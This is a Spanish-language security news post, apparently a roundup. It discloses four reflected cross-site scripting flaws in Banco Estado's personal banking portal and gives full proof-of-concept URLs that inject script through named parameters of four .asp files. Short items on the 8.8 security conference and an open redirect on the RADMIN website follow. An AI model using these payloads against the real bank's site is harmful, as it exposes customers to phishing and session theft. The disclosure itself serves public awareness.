Se han reportado cuatro vulnerabilidades Cross-Site Scripting (XSS) que afectan al portal del Banco Estado. Uno de ellos requiere tener la sesión iniciada y los otros tres pueden ser explotados sin necesidad de login. Las vulnerabilidades afectan a la Banca de Personas del Banco Estado. La primera afecta al archivo “contac_consultas.asp”, mediante la variable nombre: […]
Se han reportado cuatro vulnerabilidades Cross-Site Scripting (XSS) que afectan al portal del Banco Estado. Uno de ellos requiere tener la sesión iniciada y los otros tres pueden ser explotados sin necesidad de login. Las vulnerabilidades afectan a la Banca de Personas del Banco Estado.
La primera afecta al archivo “contac_consultas.asp”, mediante la variable nombre: https://personas.bancoestado.cl/imagenes/formularios/contac_consultas.asp?rutdig=1-9&nombre=Nombre%20Completo%20del%20Usuario%3Cem%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
Para ser explotada es necesario que el usuario tenga la sesión iniciada.
La segunda vulnerabilidad, corresponde al archivo DescargaDSB.asp, mediante la variable rut es posible inyectar el codigo malicioso: https://personas.bancoestado.cl/imagenes/detectsafe/DescargaDSB.asp?nombre=&rut=%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
La tercera está presente en detectsafe.asp, mediante la variable nombre: https://personas.bancoestado.cl/imagenes/detectsafe/detectsafe.asp?rut=&Nombre=aaaaa%22%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
Y la cuarta y úlitma, afecta al archivo respuesta_detectsafe.asp mediante la variable nombre: https://personas.bancoestado.cl/imagenes/detectsafe/respuesta_detectsafe.asp?rut=&nombre=aaaaa%22%3Eaa%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
Las cuatro vulnerabilidades permiten que un atacante se aproveche de la confianza que el usuario tiene en el sitio, ya que son vulnerabilidades XSS dentro de un sitio supuestamente “seguro”, https.
Con fecha 18 y 19 de Octubre se realizará en Santiago de Chile la segunda versión de la conferencia de seguridad informatica 8.8. Tendrá lugar en el cine arte normandie, misma ubicación del año pasado y el valor es de US$80, pudiendo obtener descuentos si compras con anticipación.
RADMIN es una herramienta para controlar computadoras de forma remota. El sitio web esta herraimenta es vulnerable a redireccion arbitraria de URL, permitiendo a un atacante redireccionar usuarios a sitios maliciosos.